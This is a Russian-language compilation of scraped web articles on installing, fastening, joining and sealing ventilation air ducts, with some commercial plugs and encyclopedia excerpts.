Способы соединения частей воздуховодов между собой

Монтаж пластиковых воздуховодов

Популярность воздуховодов из ПВХ набирает становится все выше. Пластиковые воздуховоды уже давно начали пользоваться спросом не только в вентиляционных системах на производстве, или административных зданий, но и в быту.

В зависимости от величины производительности системы вентиляции или кондиционирования отличается и монтаж пластиковых воздуховодов. Поэтому, мы рассмотрим оба варианта монтажа: в быту (с небольшой производительностью) и на производстве (вентиляция больших масштабов).

  • Монтаж в бытовых условиях
  • Монтаж на больших объектах
  • Видео

Монтаж пластиковых воздуховодов в бытовых условиях

Когда необходимо установить систему кондиционирования воздуха в небольшом помещении или проложить воздуховод от кухонной вытяжки на улицу, нужно будет воспользоваться следующими инструментами:

  • рулетка
  • линейка
  • маркер
  • молоток
  • плоскогубцы
  • тиски
  • ножовка
  • нож
  • напильник
  • возможно герметик и пистолет для него

Для начала, перед монтажом, закупкой материалов и комплектующих, нужно определится с конфигурацией будущей вентиляционной системы. Если Вы уже приобрели вытяжку, было бы неплохо установить ее в монтажное положение, и посмотреть каким образом воздуховод соединит вытяжку с наружной решеткой, какие преграды будут на пути у пластиковых вентканалов и как их обойти.

Конечно же, чтобы избежать неловкостей и нежелаемых последствий, лучше доверить весь процесс проектирования и монтажа системы специалистам, но, если Вы считаете, что такое дело Вам по силам, тогда советую для начала набросать схемку размещения оборудования и воздуховодов.

В результате этого, можно будет наглядно увидеть сколько фасонных частей, воздуховодов  и элементов крепления необходимо будет закупить.

Как выбрать нужный вид пластиковых воздуховодов?

Пластиковые воздуховоды и фасонные части, которые могут понадобится при монтаже

Обратите внимание

После того, как все материалы для осуществления монтажа подготовлены и закуплены, можно приступать непосредственно к монтажу.

При условии, когда воздух будет удалятся наружу, за пределы помещения, необходимо проделать отверстие в стене, диаметром немного большим нежели диаметр воздуховода, что будет сквозь него проходить.

Такое отверстие можно выполнить в стене для горизонтального вывода воздуховода, в перекрытии — для вертикального вывода на чердак или крышу.

Их выполняют с помощью специальных инструментов, зачастую, алмазными бурами.

Пробивание стены алмазным буром

В другом случае, вытяжная система может быть присоединена к ранее установленной  общеобменной системе вентиляции.

При варианте с кухонной вытяжкой, Ваша система будет относится к местной вентиляции, но пластиковые воздуховоды можно использовать и для местных, и для общеобменных систем вентиляции

К установленной вытяжке присоединяется переход с вытяжки в короб — переход с поворотом от круглого входа в вытяжку на прямоугольный воздуховод.

Переход с вытяжки на короб

При этом, нужно позаботится о герметизации самого места присоединения.

Присоединение воздуховода к вытяжке

Далее крепят воздуховод, повороты и отводы.

Пластиковый отвод на 45°

Чтобы скреплять между собой воздуховоды и фасонный части, используют пластиковый соединитель.

Пластиковый соединитель

Существует еще много фасонных деталей с помощью которых возможно выполнить задание почти любой сложности  и обойти любое препятствие.

Важно

Когда воздуховод подходит к месту пробивки стены, на стену крепят панель. Сам же воздуховод, при прохождении через стену, следует помещать в короб.

Панель пластиковая на стену

При выполнении монтажа обязательно возникнут ситуации, когда нужно будет укорачивать некоторые части воздуховодов. Здесь пользуются рулеткой, маркером и обычной ножовкой по металлу, которая режет пластик как масло.

Резка пластиковых воздуховодов

На выходе из системы устанавливают решетку.

Пластиковая решетка на выходе

К строительным конструкциям пластиковые воздуховоды крепят с помощью хомутов, подвесок, шпилек и других элементов крепежа. Подробнее о деталях крепления воздуховодов.

Один из способов крепления пластиковых воздуховодов

В местах, где подозревается утечка воздуха или видна неплотность, нужно использовать силиконовый герметик, а еще алюминиевый скотч. Рекомендуем к прочтению статью о герметиках и уплотнителях.

Пистолет с герметиком

В итоге должна получится сеть воздуховодов, которая выглядит примерно так.

Система вентиляции из пластиковых воздуховодов

При выполнении монтажа системы из воздуховодов ПВХ следует помнить, что провисание воздуховодов не должно превышать значения 50 мм. В связи с этим рекомендую выполнить расчет креплений и расчет расстояния между креплениями.

Как всегда, при монтаже воздуховод должен быть в максимально растянутом положении. Это обеспечит высокие аэродинамические свойства, что обусловливаются низким сопротивлением потоку воздуха.

Источник: http://airducts.ru/montazh-plastikovyx-vozduxovodov/

Справочная информация

Вентиляция — главный элемент в создании благоприятного климата, призванный для подачи свежего воздуха с улицы и удаления загрязненного воздуха из помещений.

Воздуховод — замкнутый по периметру канал, предназначенный для перемещения воздуха или смеси воздуха с примесями под действием разности давлений на концах канала. Воздух в помещениях — важный фактор, влияющий на здоровье, и, как следствие, на трудоспособность людей, в находящихся этих помещениях.

Способы соединения воздуховодов между собой:

Фланцевое соединение — неподвижное разъемное соединение трубопровода, герметичность которого обеспечивается путем сжатия уплотнительных прокладок.

Бесфланцевое соединение — При бесфланцевом соединении воздуховодов наряду с заклепками для односторонней клепки применяют винты самонарезающие. Такие винты изготавливают в виде конуса с винтовой резьбой большого шага.

При соединении металлических деталей на самонарезающих винтах в деталях просверливают отверстие и затем с помощью отвертки завинчивают винт.

Изготовленный из более твердой стали винт образует в соединяемых местах резьбу, благодаря чему обеспечивается прочное соединение, в котором надежно удерживается винт.

Системы вентиляции и системы кондиционирования воздуха включают в себя разнообразное оборудование. Прежде всего, это вентиляторные агрегаты, состоящие из вентилятора с электродвигателем, смонтированные на несущей раме или в кожухе. По конструкции вентиляторы делятся на радиальные, осевые, диаметральные, крышные.

Радиальный вентилятор представляет собой расположенное в спиральном кожухе лопаточное колесо, вращение которого обеспечивает перемещение воздуха.

Совет

В осевом вентиляторе, в отличие от радиального, не происходит изменения направления движения воздуха (воздух проходит вдоль оси рабочего колеса). У осевого вентилятора рабочее колесо закреплено на валу электродвигателя и заключено в цилиндрическую обечайку.

Крышные вентиляторы предназначены для установки на кровле производственных и общественных зданий. При обеспечении оптимальной работы, когда производительность больше минимальной, вентилятор может работать с сетью воздуховодов.

Последнее время широкое применение нашли канальные вентиляторы. Основным преимуществом канальных вентиляторов являются малогабаритность, удобство в обслуживании и низкие трудозатраты при монтаже.

Для очистки приточного, а в ряде случаев рециркуляционного и вытяжного воздуха используют воздушные фильтры.

Для борьбы с шумом в системах вентиляции и кондиционирования воздуха предусматривается установка шумоглушителей.

Дефлекторы предназначены для усиления тяги в вертикальных шахтах путем использования ветрового напора.

Гибкие гофрированные воздуховоды изготавливаются из многослойной ламинированной алюминиевой фольги и полиэфирной пленки. Гибкие воздуховоды легки, достаточно термостойки и в случае пожара не выделяют токсичных веществ или газов.

Они не нуждаются в применении специальных фасонных поворотов и потому имеют меньше соединений, что упрощает монтаж.

Однако гибкие воздуховоды обладают высоким аэродинамическим сопротивлением, поэтому их обычно применяют в качестве присоединительных патрубков небольшой длины.

Приточная вентиляция

Приточная система вентиляции служит для подачи в вентилируемые помещения чистого воздуха в замен удаленного загрязненного. Приточный воздух в необходимых случаях подвергается специальной обработке (очистке, нагреванию, увлажнению и т. д.).

Вытяжная вентиляция

Вытяжная вентиляция удаляет из помещения загрязненный воздух.

В общем случае в помещении предусматриваются как приточные, так и вытяжные системы. Их производительность должна быть сбалансирована с учетом возможности поступления воздуха в смежные помещения или из смежных помещений.

В помещениях может быть также предусмотрена только вытяжная или только приточная система.

Обратите внимание

В этом случае воздух поступает в данное помещение снаружи или из смежных помещений через специальные проемы или удаляется из данного помещения наружу, или перетекает в смежные помещения.

Общеобменная вентиляция предназначена для вентилирования всего обслуживаемого помещения, в то время как местная вентиляция предназначена для обслуживания какой-либо определенной части помещения. Подавляющее большинство проектируемых и эксплуатируемых систем вентиляции относится к общеобменной вентиляции.

Рекуперационные системы вентиляции

Более совершенные системы вентиляции с центральными приточно-вытяжными рекуперационными (с утилизацией тепла) вентиляционными установками уменьшают стоимость затрат при эксплуатации системы вентиляции до 65% относительно затрат на эксплуатацию прямоточной механической системы вентиляции. Наибольший эффект от использования такой системы наблюдается в период экстремальных значений температуры наружного воздуха (т.е. холодная зима или жаркое лето).

Источник: http://air-kursk.ru/pages/spravochnaya-informaciya

Крепление воздуховодов

Монтаж воздуховодов является наиболее трудоемким и ответственным этапом при устройстве системы вентиляции.

Способы крепления воздуховодов к поверхностям зависят от:

  • сечения воздуховода (круглое, прямоугольное),
  • от размеров воздуховода (его периметра или диаметра)
  • его назначения (тип вентиляционной системы).

Выбирайте крепление для воздуховодов по типу

Оцинкованные крепления воздуховодов

Крепления из нержавейки

Обратите внимание!

Полный каталог товаров для вентиляции — КАТАЛОГ.

Как крепить воздуховоды

  • при помощи шпильки и хомута. Самый простой способ крепления круглых воздуховодов;
  • с помощью металлических балок (тавра, двутавра, угла) при невозможности монтировать воздуховод к потолку. На профиль надевают струбцину, а к ней уже крепиться шпилька;
  • при помощи шпильки и профиля. Наиболее популярный вид крепления. Профиль может быть двух типов (Z- и L-образный). В месте, где профиль прикрепляется к шпильке, обязательно нужно поставить уплотнитель, поскольку это уменьшает частоту колебаний и уровень шума, который создает в воздуховоде поток воздуха;
  • при помощи перфоленты. Перфолента крепится на болт в местах соединения прямоугольных воздуховодов, а для круглых – создается петля. Чаще всего ее используют с хомутами и для воздуховодов с диаметром до 200 мм;
  • крепление к потолку при помощи анкеров позволяет устанавливать воздуховоды большого диаметра;
  • при помощи шпильки и траверса. Траверса поддерживает воздуховод, шпильки же ограничивают его горизонтальные перемещения. Наши специалисты рекомендуют между воздуховодом и траверсой установить для лучшего прилегания резиновый профиль.

Обратите внимание!

Купить хомуты для крепления воздуховодов или посмотреть их стоимость можно здесь.

Типы соединения воздуховодов

На расстояние между креплениями влияет тип соединения воздуховодов:

  • фланцевое,
  • бесфланцевое,
  • реечное,
  • соединение при помощи фасонных частей воздуховода

Обратите внимание: на стоимость гофрированных воздуховодов

Способы крепления воздуховодов в примерах

Например, крепежи горизонтальных круглых воздуховодов с диаметром до 400 мм и с бесфланцевым соединением, находятся на расстоянии не более 4 метров друг от друга.

Если воздуховоды имеют больший диаметр, то расстояние между креплениями сокращается до 3 метров.

Если же соединение воздуховодов фланцевое, то расстояние между крепежами может быть не более 6 метров.

Источник: http://www.dostavkasmesi.ru/articles/kreplenie-vozduhovodov.html

Как соединяются круглые воздуховоды между собой?

Система вентиляции обеспечивает воздухообмен, вентилирование потоков воздуха и влияет на температуру в помещении. Для правильной ее работы нужен профессиональный монтаж системы, в том числе и качественное соединение воздуховодов.

От материала исполнения конструкции и способа ее крепления напрямую зависит — как соединять воздуховоды в единую систему.

Методы крепления воздуховодов

Есть 4 способа крепления воздуховодов:

  • С помощью шпильки и профиля.

Более профессиональный способ крепления. Для его осуществления используют профиль с L либо Z образной формой.

  • С помощью шпильки и травеса

Этот метод крепления используют для монтирования тяжелых конструкций. Коробка уголок, которая установлена под нижний угол, уменьшает нагрузку на крепежи и способствует длительной жесткой поддержке короба.

Для того чтобы снизить уровень шума и пригасить вибрацию место крепления профиля прокладывают резиновым уплотнителем.

  • С помощью шпильки и хомута

Этот метод используют для монтирования круглых вентконструкций. Такая установка производиться на небольших участках конструкции из гибких труб. В основном используют только хомут.

Это самый бюджетный и легкий способ крепления. Для круглых конструкций – из перфоленты делают петлю, прямоугольных – перфоленту присоединяют к болтам

Популярные виды соединения металлических воздухов

За счет вида соединения металлических воздуховодов их разделяют на фальцевые и сварные.

Конструкция, которая выполнена из тонкой стали до 1-1,5 мм соединяется фальцевым методом. Если толщина материала больше производится сварное соединение воздуховода.

От того, насколько качественно были проведены соединительные работы, зависит правильная геометрическая форма и герметичность.

Наиболее распространенные фальцевые и сварные методы монтирования вентистемы:

  • На отдельном фальце с двойной отсечкой и защелкой (относится к типу соединения, в котором не используют фланцы);
  • На поперечном, угловом либо лежачем фальце;
  • При помощи специальной планки или рейки;
  • Внахлест;
  • Отбортованный стык встык.

Для прямоугольных вентконструкций, с прямым швом, распространенная проблема – «винт». Он возникает в результате сдвига во время прокатки фальца. Такой дефект соединения приводит к осевому смещению воздуховодов во время их крепления.

Монтажная шина (еврошина)

Представляет собой профиль из оцинкованной стали, который по своей форме напоминает букву L.

На одной стороне конструкции толщина шины может составлять 20 либо 30 мм.

Шина для соединения воздуховодов предназначена для работы с прямоугольными конструкциями и соответствующими фасонными частями. С конструкцией вентсистемы соединяется при помощи саморезов . Для выполнения такого монтажа используют  шинорейку со специальным уголком. Это позволяет придать конструкции жесткость и обеспечить полное соединение всех деталей вентиляционной системы.

Еврошины ускоряют процесс сборки и монтажа герметичной системы вентиляции.

Стыки шины обрабатывают герметиком или уплотнительной лентой. Если размер стороны конструкции 500мм и более – систему оборудуют дополнительными монтажными скобами.

Ниппель и муфта

Данный  тип соединения  используется при монтировании круглого воздуховода. При установке вентсистемы таким методом процесс занимает довольно краткие сроки. Для монтажей каналов вентиляции используют два типа ниппелей :

Их разница заключается лишь в том, что ниппель крепиться внутри воздуховода, а муфта снаружи.

Отличить недорогие ниппели от более дорогих можно по отсутствию уплотнительных прокладок.

Если, для соединения воздуховодов использовать более дешевый вариант ниппеля, то стыки придется герметизировать при помощи алюминиевой ленты для уплотнения либо полимерного скотча.

Соединение на ниппеле

Соединение на муфте

Реечное соединение

Реечное соединение воздуховодов – безфланцевый монтаж прямоугольных вентконструкций.

Данный метод актуален для помещений, в которых есть ограничение высоты. Для улучшения герметичности соединений используют мягкую резину либо пластику из поливинилхлориа.

Реечный метод монтирования с зубчатыми рейками, применяется довольно редко, так как во время работы создает много шума.

Бандажное соединение воздуховодов

Бандажное монтирование вентсистемы довольно удобное и подходит для монтирования вентсистемы на химических производствах. Принцип монтажа бандажным способом —  соединения прямоугольных воздуховодов между собой. Для данного типа соединения  торцы воздуховода подготавливают (отбортовывают) заранее.

На них одевают бандаж и заполняют полость герметиком. Если монтаж такой вентиляционной системы производиться на химическом производстве, то герметизирующее средство должно быть стойким и не восприимчивым  к воздействию агрессивных веществ. Данный метод довольно надежен, но в сравнении – дорогой.

Поэтом редко используется в быту.

Раструбное соединение

Раструбное соединение воздуховодов происходит путем захода одного элемента в другой. Разновидности такого монтажа:

  • Конусообразный воздуховод;
  • расширены (сужены) концы изделия.

Такой вид соединения не подойдет для вентсистемы, потому как не обладает достаточной герметичностью, но для естественной вытяжки – вполне.

Соединение пластиковых и гибких воздуховодов

Такие воздуховоды соединяются достаточно просто, так как есть широкий выбор специальных соединительных деталей и переходников в разнообразных вариациях и размерах.

Фасонные части конструкции достаточно плотно надеваются на пластиковый воздуховод, поэтому не требуется дополнительная герметизация.

Для того, чтобы соединить гибкий воздуховод из гофры — используют хомуты из пластика и алюминиевый скотч.

Более детально данный вид соединения описан в видео:

Другие способы соединения

Фланцевое соединение воздуховодов достаточно надежное, но не особо актуальное в связи с высокой стоимостью. Оно имеет высокий уровень жесткости. С одной стороны это плюс, но с другой – минус, так как при малейших изменениях конфигурации неподходящие детали можно попросту отправить на переплавку.

Есть множество вариантов крепежа такого соединения. Но, самый распространенный – точечная сварка. Этот метод наиболее быстрый и простой. Минус такого соединения в том, что оно не достаточно надежное, в особенности при работе с оцинкованными деталями.

Поскольку цинк во время сварки может прогореть, то велика вероятность коррозии сварочного шва, в следствии ослабиться фиксация конструкции. Дабы избежать таких последствий, рекомендуется вместо сварки для крепежа использовать устойчивые к коррозии заклепки.

Важно

Здравствуйте, уважаемый читатель! Эффективность современных вентиляционных устройств во многом зависит от качества сборки её элементов. Если будет нарушена технология установки, даже при грамотно выполненном аэродинамическом расчёте не удастся изготовить надежную систему.

Важную роль играет при этом соединение воздуховодов между собой. Рассмотрим их способы, особенности применения в различных ситуациях.

Методы крепления воздуховодов

Крепят воздушные рукава чаще всего к потолку или стенам помещения, а технология крепления зависит от их типоразмеров и конфигурации.

По профилю сечения они подразделяются на прямоугольные и круглые отводы. Методы крепления применяют к ним разные.

Для крепежа прямоугольных каналов используют технологию с применением:

  • Шпильки и профилей Z и L-образных форм.
  • Шпильки и траверса.

Используют данные методы при монтаже тяжелых конструкций.

Для каналов круглого сечения применяют:

  • Хомут и шпильку.
  • Перфоленту и хомут.

Подобные способы крепежа распространены при сборке небольших систем.

Виды соединения металлических воздуховодов

Круглые отводы монтируются на следующих соединениях:

  • Фланцевых.
  • Ниппельных.
  • Муфтовых.
  • Бандажных.

Для прямоугольных каналов используются:

  • Соединения на шинах.
  • Реечные.
  • Фланцевые.

Наряду с ними применяются классические соединения раструбом и сваркой.

Монтажная шина еврошина

Как правило, прямоугольные воздуховоды и фасонные детали стыкуются фланцевыми соединениями, созданными на основе монтажной шины. Другие названия этой уникальной конструкции – «еврошина», шинорейка.

Представляет она собой профиль L-образной конфигурации, благодаря которой стороны короба жестко фиксируются во фланце.

Изделие производится шириной 20 и 30 мм. Для создания фланца шинорейка нарезается по размеру на четыре части, собирается с помощью уголков, вставляется в отвод и прикрепляется к нему саморезами или болтами.

Места сопряжения стыкуемых фланцев по периметру прокладывают уплотнителем или смазывают герметиком. Прилегающие фланцы соединяют между собой болтами. Для придания дополнительной плотности прилегания устанавливают через каждые 50 см по периметру узла зажимные скобы (струбцины).

Монтажные шины обеспечивают герметичное соединение, создают дополнительную жесткость в вентиляционной конструкции.

Ниппель и муфта

Эти виды соединения используются в работе с круглыми вентиляционными трубами на прямолинейных участках.

Ниппель представляет собой отрезок трубы, середину которого опоясывает выпуклое ребро.

Деталь вставляют в трубу, где она фиксируется этим выступом. На неё надевается следующий сегмент вентиляционной системы. Стыковочный узел обклеивается алюминиевым скотчем.

Совет

Муфта по сути является внешним ниппелем и отличается от него только бортиком, выступающим внутрь, и размером сечения: оно больше диаметра трубопровода. Соответственно, муфта надевается на стыкуемые отводы с внешней стороны и закрывает место сопряжения.

Схема муфтового соединения

Реечное

Реечный способ состыковки используют при монтаже прямоугольных воздуховодов, длина сторон которых составляет 40 см и меньше.

Примыкающие торцы каналов с отгибами бортов соединяют, в изгибы вставляют рейку и загоняют её на всю длину сторон. Затем стык уплотняют молотком. Способ востребован в местах, ограниченных высотой.

Недостатком реечных стыков является утечка воздуха через них. Чтобы улучшить герметичность узла, применяют уплотняющие материалы из резины или полимера.

Способ соединения прямоугольных отводов на рейке

Бандажное

Ещё одним из бесфланцевых способов соединения является стыковка каналов бандажом. Он изготавливается из тонколистовой оцинкованной стали и предназначается для сборки круглых воздуховодов малого и среднего диаметра.

Соединитель надевают на отбортованные торцы соединяемых труб, предварительно заполнив его выемку герметиком. Стягивают концы бандажа, к которым приварены угольники, струбциной или специальным приспособлением. Затем болтовым соединением закрепляют бандаж на отводах.

Схема установки бандажа: а — соединитель, б — узел стыковки; 1 —бандаж, 2 — воздуховоды

Раструбное

Самый простой и быстрый способ монтажа воздушных каналов. Отводы изготовляются слегка конусообразной формы и собираются в единую вентиляционную систему путем вставления следующего отвода в предыдущий элемент.

Для герметизации применяют герметик.

Используют при монтаже круглых воздуховодов, сборке сэндвич-дымоходов, пригоден для оборудования вытяжного канала естественной вентиляции.

Видео: трубы из нержавеющей стали, способы соединения

Как соединять пластиковые и гибкие воздуховоды

Монтаж пластиковых вентиляционных труб не представляет никаких сложностей. Для сборки пластиковых систем производителями выпускаются специально подобранные фасонные детали и переходники, подходящие по своим типоразмерам воздуховодам. Эти соединители просто вставляются друг в друга и промазываются силиконом.

Отводы от компрессора соединяются быстросъемами и фитингами, которые бывают металлическими или пластиковыми.

Как соединить вытяжку с воздуховодом

Главное правило – диаметр подключаемого канала не должен быть меньше сечения выходного фланца вытяжки. Если же мощность вытяжки небольшая и возникла необходимость подключения отвода меньшего сечения, или прямоугольного канала, применяется соответствующий переходник, который надевается на выходное отверстие вытяжки. Соединения герметизируются силиконом.

Подробно монтаж пластикового воздуховода описан в данном видео

Заключение

Мы рассмотрели наиболее популярные соединения воздушных каналов. Надеемся, что представленная информация будет полезной для вас. Желаем успехов в благоустройстве вашего жилища, подписывайтесь на наши статьи, делитесь полученными знаниями в социальных сетях.

Комментариев:

Рейтинг: 89

Современные вентиляционные системы обеспечивают качественное вентилирование воздушных потоков, воздухообмен, поддержание температуры на заданном уровне. Чтобы все параметры гарантировать, необходим профессиональный монтаж, предусматривающий качественное соединение воздуховодов.

Конструкция вентиляционных каналов и воздуховодов: а — в кирпичных стенах, б — в бороздах стены, заделываемых плитами, в — подвесной воздуховод у потолка, г—приставные вертикальные каналы, д — компоновка каналов со встроенными шкафами, е — каналы из сухой штука­турки в перегородках, 1 — кирпичные стены, 2 — штукатурка, 3 — гипсошлаковые плиты, 4 — перекрытие, 5 — подвеска стальная, 6 — крепление (50х50х4 мм).

Сегодня в строительстве используют несколько способов соединения воздуховодов, каждый из которых используется в зависимости от используемого материала и условий монтажа.

Соединения для металлических воздуховодов

Основные способы соединения подобных элементов — фальцевые или сварные. В большой степени это зависит от толщины используемого металла. Если для изготовления применяется тонколистовая сталь (не более 1-1,5 мм толщиной), то выполняют фальцевое соединение.

При большей толщине стенок понадобится сварочный аппарат. От того, как выполнена стыковка, зависят герметичность всей системы, ее производительность, работоспособность, долговечность. Наиболее типичные фальцевые, сварные соединения:

Принципиальная схема конструкции воздуховода из оцинкованной стали на фланцевых соединениях.

  • на отдельном фальце, имеющем двойную отсечку, с защелкой (относится к бесфланцевым соединениям воздуховодов);
  • на угловом, поперечном или лежачем фальце;
  • посредством специальной планки, рейки;
  • встык и встык с использованием отбортовки;
  • внахлест.

Способы соединения воздуховодов с прямоугольным, круглым сечением имеют свои особенности. Чаще всего для фиксации деталей используют фланцы, бандажи, шины, а также ниппельный (муфтовый) способ и раструбный.

Источник: https://otoplenie-help.ru/kak-soedinyayutsya-kruglye-vozduhovody-mezhdu-soboy.html

Соединение воздуховодов при помощи шины и уголка

Способ соединения воздуховодов между собой, осуществляемый при помощи шины и уголка, оправдывает свою популярность. Чтобы соединить воздуховоды, имеющие сторону 80 — 1500 мм необходимо три типоразмера шины, имеющей планку 20, 30 или 40 мм.

Чтобы нарезать шину применяется маятниковая пила, которая стоит не дорого (намного дешевле пресса). Отечественная маятниковая пила будет стоить около 500 долларов, а импортная (например, Haberly) — до 4 тыс. долларов. Уголки штампуются в заводских условиях и имеют стандартную конфигурацию и размерные характеристики.

Учитывая невысокую цену на шины и уголки, цена на воздуховоды в доме также будет невысокой.

Обратите внимание

Сегодня существует несколько отечественных производителей шин и уголков и огромное количество поставщиков импортного товара. Данный показатель распространяется и на изготовление воздуховодов.

Визуально отечественные и импортные шины, а также уголки имеют сходство, однако они имеют и различия в конфигурации, которая влияет на использование и на качество соединения между элементами системы вентиляции.

Каковы требования к шинам? Они должны быть жесткими. В соответствии со стандартами, толщина стального листа, который используется для изготовления профиля, должна составлять не меньше 0,7 мм, хотя зачастую берется лист с толщиной 0,8 мм, а для шины, имеющих планку 20 мм и — толщина стального листа должна составлять 1 мм и больше.

Немецкая продукция, однако, не отвечает таким требованиям, хотя вписывается в немецкий стандарт 0,7±10%. Но при наличии крупных размеров воздуховодов шина, имеющая толщину стали 0,63 мм, зачастую теряет свою жесткость.

Имеется и другая крайность, при которой для изготовления тонкостенного воздуховода используется шина из листа, толщиной в 1мм.

Принципиальным также является соблюдение правильности геометрии профиля. Важна четкая граница участка, используемого для соединения шины и воздуховода.

При его отсутствии при пуклевке возникает попадание инструмента на наклонную плоскость, что вызывает выход из строя целого комплекта пуансонов (стоимость последнего 150 — 180 долларов).

Отечественный же профиль, исключает неправильность геометрии профиля.

Особенностью новой отечественной шины является еще и то, что она отлично совмещается со всеми существующими на рынке уголками (и отечественного производства, и импортного). Следовательно, новые отечественные шины обладают большей конкурентоспособностью, качеством и рентабельностью по сравнению с импортными.

8-800-222-17-13
+7 (495) 989-63-58
+7 (926) 838-50-82

Источник: http://xn--b1agjtz.xn--p1ai/soedinenie-vozduhovodov-pri-pomosch

Герметизация воздуховодов: виды соединений, разрешенные герметики

Воздуховоды используются в различных системах от промышленного назначения до бытового. Благодаря системам воздуховодов обеспечивается транспортировка необходимых воздушных веществ, и, конечно, обеспечение бесперебойной подачи кислорода для жизнидеятельности. Именно поэтому герметизация таких систем не менее важна, чем уплотнение других трубопроводов.

Соединения воздуховодов и виды герметиков

Воздуховоды бывают круглого и прямоугольного сечения. Как показывает практика, надежнее и долговечнее круглые воздуховоды. Они имеют высокий показатель воздухонепроницаемости за счет меньшей и по форме более простой площади герметизации.

Для воздуховода традиционно характерны такие виды разъемных соединений:

  • Фланцевые
  • Бандажные
  • Муфтовые
  • Ниппельные
  • Раструбные

Самые распространенные — фланцевые соединения. Их герметизируют в процессе монтажа, когда между двумя частями фланца помещают прокладку или специальный герметизирующий состав.

Части фланца скрепляют болтами или гайками. Такой вид герметизации носит название «внутренний», т.е. герметик наносится внутрь соединения.

Иногда фланец дополнительно изолируют еще и сверху, используя уплотнительную  ленту

Важно

Выбор герметика для фланца зависит от температуры воздуха (для воздуховодов свыше 70°С применяют только термостойкие материалы), сечений и формы сланца, а также его качества. Особое внимание уделяют внутренней поверхности фланца. Перед герметизацией проверяют, есть ли на ней дефекты (трещины, впадины, заусенцы).

Для фланцевых соединений допустимы: асбестовый шнур, хризолитовая прядь, прокладки из пористой резины, асбестового картона, пластикат ПВХ, термоуплотнительная лента, акриловые мастики, анаэробные герметики.

Для фланцевых и иных соединений действует универсальное правило: если планируется применение специальных герметиков, которые не указаны в Инструкции, СНиПах и ГОСТах, их необходимо включить в проектную документацию с обоснованием эффективности, допустимости для системы и сопроводительной разрешительной документацией.

Бандажные соединения считаются одними из самых надежных и безопасных, а потому используются в ответственных системах и на производствах.

Это еще и дорогостоящие соединения, состоящие из специальной конструкции — бандажа — который надевают на определенный участок воздуховода. Внутреннюю полость между трубой и бандажом заполняют мастикой.

В зависимости от характеристики среды, мастика может быть невысыхающей, термостойкой, подходящей для агрессивных сред.

Муфтовые и ниппельные соединения различаются способом крепления. Муфту крепят сверху воздуховода, ниппель — внутрь.

Для герметизации таких соединений используют термостойкие прокладки, мастики, а также уплотнительные ленты и алюминиевый скотч. Специалисты рекомендуют использовать сразу два герметика.

Если в процессе эксплуатации трубопровода лента испортится (износ ее довольно высок), надежность соединения гарантируется вторым герметиком.

Раструбные соединения называют также соединением «стакан в стакан».

В этом случае труба меньшего диаметра помещается внутри трубы большего, а место между ними заполняют жидким акриловым герметиком или мастикой.

Совет

При этом наносят состав на меньшую трубу, чтобы не допустить его попадание в воздуховод. Сверху такое соединение дополнительно уплотняют лентой или алюминиевым скотчем.

Выше речь шла о жестких воздуховодах. Но существуют и воздуховоды гибкие, изготовленные из гофрированной трубы. Возможны два варианта соединения таких труб.

Вариант 1. Фланцевое соединение. Крепится на уголки жесткости и уплотняется силиконовым герметиком или резиновой прокладкой. Анаэробный герметик также подойдет для уплотнения, если соответствует критериям температуры, давления, огнестойкости. Впрочем, как и любой другой материал, получивший предварительный допуск.

Вариант 2. Соединения с хомутом. Для такого соединения гибкого трубопровода дополнительно используется патрубок. В качестве герметика используют алюминиевую ленту, скотч или мастику. Сверху на участок надевают хомут — металлический или нейлоновый.

Надежность, долговечность, соответствие сроку эксплуатации системы, безопасность для транспортируемой и окружающей среды — вот главные факторы выбора герметика. Сюда же следует добавить простую технологию нанесения, высокую скорость герметизации и удобство при работе с материалом.

Таким требованиям (главным факторам) отвечают наши уплотнительные материалы, которые Вы можете приобрести в каталоге продукции РСТ.

Источник: https://re-st.ru/articles/germetizatciia-vozdukhovodov-vidy-soedinenii-razreshennye-germetiki/

Большая Энциклопедия Нефти и Газа

Cтраница 1

Фасонные части воздуховодов: а — переход с прямоугольного сечения на круглое; б — отвод круглого сечения; в — утка круглого сечения; s — тройник круглого сечения; д — крестовина круглого сечения.  [1]

Фальцевые соединения.  [2]

Фасонные части воздуховодов раскраивают с помощью совмещенных шаблонов.  [3]

Отдельные прямые и фасонные части воздуховодов соединяют между собой различными способами: при помощи фланцев, раструбов, обжимных бандажей, а также сваркой. Все эти способы соединений в принципе ни в чем не отличаются от соединения между собой технологических трубопроводов и подробно описаны на стр.

При раструбном соединении звеньев воздуховода из листа винипласта толщиной 8 — 10 мм изготовляют кольцо шириной 100 мм, которое затем нагревают до размягчения и надевают на конец воздуховода так, чтобы оно обжало его. После остывания кольца его приваривают к телу трубы.

Затем изготовляют второе кольцо шириной 200 мм, надевают его на конец трубы с выпуском на 150 мм для образования раструба и приваривают к первому кольцу.  [4]

Всефасонные части воздуховодов для предотвращения их засорения следует выполнять с плавными поворотами по стандартному раскрою. В особенности это относится к коленам, радиус поворота которых должен превышать диаметр менее чем в 3 раза.

Характерным является быстрое изнашивание тех частей воздуховодов ( например, колен) и пылезадерживающих устройств, которые подвергаются удару пылевого потока. Поэтому воздуховоды нужно проектировать так, чтобы эти части было можно легко заменять.

В особенности быстрый износ наблюдается при абразивной пыли.  [5]

Разметкафасонных частей воздуховодов ( отводов, тройников, крестовин, переходов) является сложной и трудоемкой операцией.

Разметку тройников и крестовин круглого сечения ( наиболее сложную) диаметром до 900 мм выполняют, как правило, с помощью инвентарных совмещенных шаблонов.

Обратите внимание

Разметку тройников и крестовин диаметром более 900 мм выполняют с помощью специальных таблиц для разметки по координатам.  [6]

Разметкуфасонных частей воздуховодов при индустриальном методе изготовления выполняют с помощью унифицированных шаблонов. В тех случаях, когда размеры воздуховодов не совпадают с размерами, указанными в нормали, при разметке приходится производить сложные построения, которые снижают производительность труда рабочего.  [7]

Разметкуфасонных частей воздуховодов при индустриальном методе изготовления выполняют с помощью унифицированных шаблонов. В тех случаях, когда размеры монтируемых воздуховодов не совпадают с размерами, указанными в нормах, при разметке приходится производить сложные построения, которые снижают производительность труда рабочего.  [8]

Линиифасонных частей воздуховодов состоят из участков изготовления отводов и изготовления тройников и крестовин с самостоятельным технологическим процессом, оснащенных соответствующим оборудованием.

Изготовление фасонных частей круглого и прямоугольного сечений организуется также раздельно на самостоятельных участках.

Как уже указывалось, картины изготовляют на начальных участках линий прямиков, откуда они передаются на участок разметки, расположенный в начале двух линий изготовления фасонных частей.  [9]

Прямые участки ифасонные части воздуховодов транспортируют в контейнерах в горизонтальном положении.  [11]

Прямые участки ифасонные части воздуховодов транспортируют в контейнерах в горизонтальном положении.  [13]

Важно

